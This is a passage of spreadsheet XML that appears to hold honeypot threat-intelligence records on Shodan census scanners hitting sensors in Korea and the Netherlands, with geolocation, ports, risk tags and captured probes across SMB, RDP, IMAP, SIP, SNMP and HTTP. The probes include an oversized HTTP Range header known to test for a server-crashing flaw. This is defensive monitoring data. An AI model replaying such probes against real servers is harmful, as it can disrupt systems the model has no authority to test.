    <s v="Seongnam-si"/>
    <s v="Seongnam-si (Buljeong-ro)"/>
    <s v="1897000"/>
    <s v="13606"/>
    <s v="37.3654"/>
    <s v="127.122"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="Kornet"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:79b9:2878"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2044"/>
    <x v="2044"/>
    <s v="wine.census.shodan.io&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-13T04:10:05"/>
    <d v="2024-03-21T14:34:31"/>
    <d v="2025-04-13T04:10:05"/>
    <n v="1192"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh'&amp;&amp; 'attack-target:sip']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H46&amp;&amp;SMA-LAB_MT-CPA_H29&amp;&amp;SMA-LAB_SMB_H39&amp;&amp;SMA-LAB_SMB_H30&amp;&amp;SMA-LAB_HTTPS_H19&amp;&amp;SMA-LAB_IMAP_H2&amp;&amp;SMA-LAB_SOCKS5_H12&amp;&amp;SMA-LAB_MYSQL_H5&amp;&amp;SMA-LAB_SOCKS5_H44&amp;&amp;SMA-LAB_HTTPS_H4&amp;&amp;SMA-LAB_LDAP_H9&amp;&amp;SMA-LAB_PJL_H27&amp;&amp;SMA-LAB_SMB_H35&amp;&amp;SMA-LAB_HTTPS_H24&amp;&amp;SMA-LAB_POSTGRES_H17&amp;&amp;SMA-LAB_SNMP_H25&amp;&amp;SMA-LAB_REDIS_H27&amp;&amp;SMA-LAB_POSTGRES_H26&amp;&amp;SMA-LAB_SNMP_H16&amp;&amp;SMA-LAB_PJL_H12&amp;&amp;SMA-LAB_VNC_H24&amp;&amp;SMA-LAB_FTP_H4&amp;&amp;SMA-LAB_POSTGRES_H24&amp;&amp;SMA-LAB_LDAP_H39&amp;&amp;SMA-LAB_SOCKS5_H11&amp;&amp;SMA-LAB_POP3_H35&amp;&amp;SMA-LAB_LDAP_H8&amp;&amp;SMA-LAB_FTP_H38&amp;&amp;SMA-LAB_SOCKS5_H14&amp;&amp;SMA-LAB_MSSQL_H32&amp;&amp;SMA-LAB_IMAP_H22&amp;&amp;SMA-LAB_IMAP_H5&amp;&amp;SMA-LAB_HTTPS_H41&amp;&amp;SMA-LAB_POP3_H16&amp;&amp;SMA-LAB_SOCKS5_H26&amp;&amp;SMA-LAB_ORACLE_H47&amp;&amp;SMA-LAB_FTP_H27&amp;&amp;SMA-LAB_POP3_H34&amp;&amp;SMA-LAB_RDP_H17&amp;&amp;SMA-LAB_ORACLE_H15&amp;&amp;SMA-LAB_IRC_H19&amp;&amp;SMA-LAB_MYSQL_H25&amp;&amp;SMA-LAB_REDIS_H31&amp;&amp;SMA-LAB_REDIS_H11&amp;&amp;SMA-LAB_PJL_H26&amp;&amp;SMA-LAB_SOCKS5_H35&amp;&amp;SMA-LAB_POSTGRES_H39&amp;&amp;SMA-LAB_MSSQL_H47&amp;&amp;SMA-LAB_PJL_H35&amp;&amp;SMA-LAB_MSSQL_H10&amp;&amp;SMA-LAB_REDIS_H26&amp;&amp;SMA-LAB_NTP_H25&amp;&amp;SMA-LAB_SNMP_H29&amp;&amp;SMA-LAB_MT-CPA_H47&amp;&amp;SMA-LAB_SOCKS5_H25&amp;&amp;SMA-LAB_POP3_H14&amp;&amp;SMA-LAB_ORACLE_H2&amp;&amp;SMA-LAB_MSSQL_H33&amp;&amp;SMA-LAB_SNMP_H27&amp;&amp;SMA-LAB_LDAP_H22&amp;&amp;SMA-LAB_SNMP_H38&amp;&amp;SMA-LAB_ORACLE_H38&amp;&amp;SMA-LAB_IRC_H28&amp;&amp;SMA-LAB_SMTP_H23&amp;&amp;SMA-LAB_POP3_H39&amp;&amp;SMA-LAB_POP3_H5&amp;&amp;SMA-LAB_REDIS_H45&amp;&amp;SMA-LAB_POSTGRES_H33&amp;&amp;SMA-LAB_SNMP_H36&amp;&amp;SMA-LAB_IRC_H10&amp;&amp;SMA-LAB_ORACLE_H37&amp;&amp;SMA-LAB_IMAP_H19&amp;&amp;SMA-LAB_IMAP_H3&amp;&amp;SMA-LAB_ORACLE_H29&amp;&amp;SMA-LAB_FTP_H12&amp;&amp;SMA-LAB_PJL_H5&amp;&amp;SMA-LAB_PJL_H9&amp;&amp;SMA-LAB_VNC_H18&amp;&amp;SMA-LAB_MYSQL_H33&amp;&amp;SMA-LAB_MT-CPA_H17&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_IMAP_H25&amp;&amp;SMA-LAB_IMAP_H46&amp;&amp;SMA-LAB_SNMP_H12&amp;&amp;SMA-LAB_LDAP_H33&amp;&amp;SMA-LAB_SOCKS5_H10&amp;&amp;SMA-LAB_PJL_H28&amp;&amp;SMA-LAB_IRC_H6&amp;&amp;SMA-LAB_IMAP_H23&amp;&amp;SMA-LAB_POP3_H21&amp;&amp;SMA-LAB_SMTP_H6&amp;&amp;SMA-LAB_PJL_H21&amp;&amp;SMA-LAB_POSTGRES_H15&amp;&amp;SMA-LAB_IMAP_H8&amp;&amp;SMA-LAB_SNMP_H10&amp;&amp;SMA-LAB_MYSQL_H34&amp;&amp;SMA-LAB_REDIS_H39&amp;&amp;SMA-LAB_MYSQL_H40&amp;&amp;SMA-LAB_IMAP_H21&amp;&amp;SMA-LAB_IMAP_H31&amp;&amp;SMA-LAB_MT-CPA_H19&amp;&amp;SMA-LAB_POP3_H38&amp;&amp;SMA-LAB_POSTGRES_H22&amp;&amp;SMA-LAB_SMB_H34&amp;&amp;SMA-LAB_HTTPS_H10&amp;&amp;SMA-LAB_SMTP_H46&amp;&amp;SMA-LAB_FTP_H24&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_ORACLE_H33&amp;&amp;SMA-LAB_SMTP_H36&amp;&amp;SMA-LAB_PJL_H46&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_POP3_H18&amp;&amp;SMA-LAB_SIP_H19&amp;&amp;SMA-LAB_HTTPS_H44&amp;&amp;SMA-LAB_POSTGRES_H35&amp;&amp;SMA-LAB_PJL_HC1&amp;&amp;SMA-LAB_MYSQL_H29&amp;&amp;SMA-LAB_SOCKS5_H15&amp;&amp;SMA-LAB_MT-CPA_H34&amp;&amp;SMA-LAB_IMAP_H39&amp;&amp;SMA-LAB_IMAP_H30&amp;&amp;SMA-LAB_REDIS_H8&amp;&amp;SMA-LAB_SMTP_H9&amp;&amp;SMA-LAB_SNMP_H5&amp;&amp;SMA-LAB_IRC_H31&amp;&amp;SMA-LAB_SMB_H18&amp;&amp;SMA-LAB_SMB_H19&amp;&amp;SMA-LAB_POSTGRES_H41&amp;&amp;SMA-LAB_MYSQL_H27&amp;&amp;SMA-LAB_IRC_H34&amp;&amp;SMA-LAB_ORACLE_H25&amp;&amp;SMA-LAB_MYSQL_H6&amp;&amp;SMA-LAB_POSTGRES_H46&amp;&amp;SMA-LAB_REDIS_H22"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;50448&amp;&amp;445&amp;&amp;443&amp;&amp;143&amp;&amp;1080&amp;&amp;3306&amp;&amp;389&amp;&amp;9100&amp;&amp;5432&amp;&amp;161&amp;&amp;6379&amp;&amp;5900&amp;&amp;21&amp;&amp;110&amp;&amp;1433&amp;&amp;1521&amp;&amp;3389&amp;&amp;6667&amp;&amp;NA&amp;&amp;12420&amp;&amp;25&amp;&amp;23183&amp;&amp;31231&amp;&amp;29011&amp;&amp;20041&amp;&amp;23&amp;&amp;26977&amp;&amp;23320&amp;&amp;80&amp;&amp;7349&amp;&amp;7605&amp;&amp;13443&amp;&amp;20217&amp;&amp;58720&amp;&amp;58732&amp;&amp;58722&amp;&amp;56272&amp;&amp;56282&amp;&amp;11187&amp;&amp;32335&amp;&amp;57908&amp;&amp;20270&amp;&amp;32243&amp;&amp;24858&amp;&amp;8108&amp;&amp;26260&amp;&amp;16655&amp;&amp;18438&amp;&amp;45138&amp;&amp;26810&amp;&amp;7525"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="NL"/>
    <s v="The Netherlands"/>
    <s v="NH"/>
    <s v="North Holland"/>
    <s v="Gemeente Amsterdam"/>
    <s v="Amsterdam"/>
    <s v="2759794"/>
    <s v="1012"/>
    <s v="52.3702"/>
    <s v="4.89517"/>
    <s v="174"/>
    <s v="Cogent Communications"/>
    <s v="Cogent Communications"/>
    <s v="hosting"/>
    <s v="BlackHOST Ltd."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;query&amp;&amp;stshash&amp;&amp;command&amp;&amp;NA&amp;&amp;request&amp;&amp;login&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.5.0', 'version': '0'}}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=root'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=cyodgmwu'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=eltons'}}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'FNJN0'}}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'A001'}}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'JOFD0'}}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=185.142.236.35;rport=26810'}}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'HELP'}}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'FEAT'}}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000a_'}}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'STARTTLS', 'data': 'None'}}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'OEON0'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000a_'}}&amp;&amp;{Data_SMB:Incoming connection (185.142.236.35,42514)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (WORKGROUP,SHODAN)}&amp;&amp;{Data_SMB:Incoming connection (185.142.236.35,42520)}&amp;&amp;{Data_SMB:Incoming connection (185.142.236.35,42532)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_NTP:NA}&amp;&amp;{Data_SMB:Incoming connection (185.142.236.35,42360)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (WORKGROUP,SHODAN)}&amp;&amp;{Data_SMB:Incoming connection (185.142.236.35,42362)}&amp;&amp;{Data_SMB:Incoming connection (185.142.236.35,42378)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'KKGN0'}}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'FJBH0'}}&amp;&amp;{Data_SNMP:{'community': 'UnKnown', 'oids': 'UnKnown', 'version': 'UnKnown'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=c0q7f26u'}}&amp;&amp;{Data_HTTP:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Encoding': 'identity', 'Host': '154.26.156.60', 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'identity', 'Host': '154.26.156.60', 'method': 'GET', 'uri': '/robots.txt'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'identity', 'Host': '154.26.156.60', 'method': 'GET', 'uri': '/.well-known/security.txt'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '154.26.156.60', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'JHCM0'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000a_'}}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'ENNN0'}}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'KBMB0'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000a_'}}&amp;&amp;{Data_HTTPS:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Encoding': 'identity', 'Host': '5.181.21.224', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'identity', 'Host': '5.181.21.224', 'method': 'GET', 'uri': '/robots.txt'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'identity', 'Host': '5.181.21.224', 'method': 'GET', 'uri': '/sitemap.xml'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'identity', 'Host': '5.181.21.224', 'method': 'GET', 'uri': '/.well-known/security.txt'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '5.181.21.224', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTP:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Encoding': 'identity', 'Host': '38.60.171.39', 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'INFD0'}}&amp;&amp;{Data_HTTPS:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Encoding': 'identity', 'Host': '194.4.48.242', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'identity', 'Host': '194.4.48.242', 'method': 'GET', 'uri': '/robots.txt'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'identity', 'Host': '194.4.48.242', 'method': 'GET', 'uri': '/sitemap.xml'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'identity', 'Host': '194.4.48.242', 'method': 'GET', 'uri': '/.well-known/security.txt'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '194.4.48.242', 'Range': 'bytes= 0 - 018446744073709551615', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=2k0s4ofc'}}&amp;&amp;{Data_SMB:Incoming connection (185.142.236.35,52750)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (WORKGROUP,SHODAN)}&amp;&amp;{Data_SMB:Incoming connection (185.142.236.35,52760)}&amp;&amp;{Data_SMB:Incoming connection (185.142.236.35,52770)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (185.142.236.35,36354)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (WORKGROUP,SHODAN)}&amp;&amp;{Data_SMB:Incoming connection (185.142.236.35,44352)}&amp;&amp;{Data_SMB:Incoming connection (185.142.236.35,44356)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=f1nv0nxj'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=ijj3hyip'}}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'HOKK0'}}&amp;&amp;{Data_HTTPS:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Encoding': 'identity', 'Host': '144.126.148.5', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'identity', 'Host': '144.126.148.5', 'method': 'GET', 'uri': '/robots.txt'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'identity', 'Host': '144.126.148.5', 'method': 'GET', 'uri': '/sitemap.xml'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '144.126.148.5', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=1b5zzs42'}}&amp;&amp;{Data_HTTPS:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Encoding': 'identity', 'Host': '38.54.42.176', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'identity', 'Host': '38.54.42.176', 'method': 'GET', 'uri': '/robots.txt'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'identity', 'Host': '38.54.42.176', 'method': 'GET', 'uri': '/sitemap.xml'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'identity', 'Host': '38.54.42.176', 'method': 'GET', 'uri': '/.well-known/security.txt'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '38.54.42.176', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTPS:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Encoding': 'identity', 'Host': '38.54.117.64', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'identity', 'Host': '38.54.117.64', 'method': 'GET', 'uri': '/robots.txt'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'identity', 'Host': '38.54.117.64', 'method': 'GET', 'uri': '/sitemap.xml'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'identity', 'Host': '38.54.117.64', 'method': 'GET', 'uri': '/.well-known/security.txt'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '38.54.117.64', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'identity', 'Host': '144.126.148.5', 'method': 'GET', 'uri': '/.well-known/security.txt'}}&amp;&amp;{Data_SMB:Incoming connection (185.142.236.35,38724)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (WORKGROUP,SHODAN)}&amp;&amp;{Data_SMB:Incoming connection (185.142.236.35,38738)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=7a5irji5'}}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'BPCK0'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000a_'}}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'HPDL0'}}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'JMLF0'}}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'EMOA0'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=4zv3zbsd'}}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'HEEK0'}}&amp;&amp;{Data_SMB:Incoming connection (185.142.236.35,58392)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (WORKGROUP,SHODAN)}&amp;&amp;{Data_SMB:Incoming connection (185.142.236.35,58408)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=7gnva6og'}}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'LAKP0'}}&amp;&amp;{Data_SMB:Incoming connection (185.142.236.35,38348)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (WORKGROUP,SHODAN)}&amp;&amp;{Data_SMB:Incoming connection (185.142.236.35,38364)}&amp;&amp;{Data_SMB:Incoming connection (185.142.236.35,38368)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_HTTPS:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Encoding': 'identity', 'Host': '185.234.67.80', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'identity', 'Host': '185.234.67.80', 'method': 'GET', 'uri': '/robots.txt'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'identity', 'Host': '185.234.67.80', 'method': 'GET', 'uri': '/sitemap.xml'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'identity', 'Host': '185.234.67.80', 'method': 'GET', 'uri': '/.well-known/security.txt'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'identity', 'Host': '5.253.43.207', 'method': 'GET', 'uri': '/robots.txt'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'identity', 'Host': '5.253.43.207', 'method': 'GET', 'uri': '/sitemap.xml'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'identity', 'Host': '5.253.43.207', 'method': 'GET', 'uri': '/.well-known/security.txt'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '5.253.43.207', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '5.253.43.207', 'Range': 'bytes= 0 - 018446744073709551615', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_SMB:Incoming connection (185.142.236.35,44796)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (WORKGROUP,SHODAN)}&amp;&amp;{Data_SMB:Incoming connection (185.142.236.35,44798)}&amp;&amp;{Data_SMB:Incoming connection (185.142.236.35,44810)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000a_'}}&amp;&amp;{Data_HTTP:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Encoding': 'identity', 'Host': '66.94.127.183', 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'identity', 'Host': '66.94.127.183', 'method': 'GET', 'uri': '/robots.txt'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'identity', 'Host': '66.94.127.183', 'method': 'GET', 'uri': '/sitemap.xml'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '66.94.127.183', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_SMB:Incoming connection (185.142.236.35,45296)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (WORKGROUP,SHODAN)}&amp;&amp;{Data_SMB:Incoming connection (185.142.236.35,45304)}&amp;&amp;{Data_SMB:Incoming connection (185.142.236.35,45310)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b98e:ec23"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2045"/>
    <x v="2045"/>
    <s v="hat.census.shodan.io&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-13T04:10:05"/>
    <d v="2023-07-24T16:15:34"/>
    <d v="2025-04-13T04:10:05"/>
    <n v="3433"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:mail'&amp;&amp; 'attack-target:sip']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
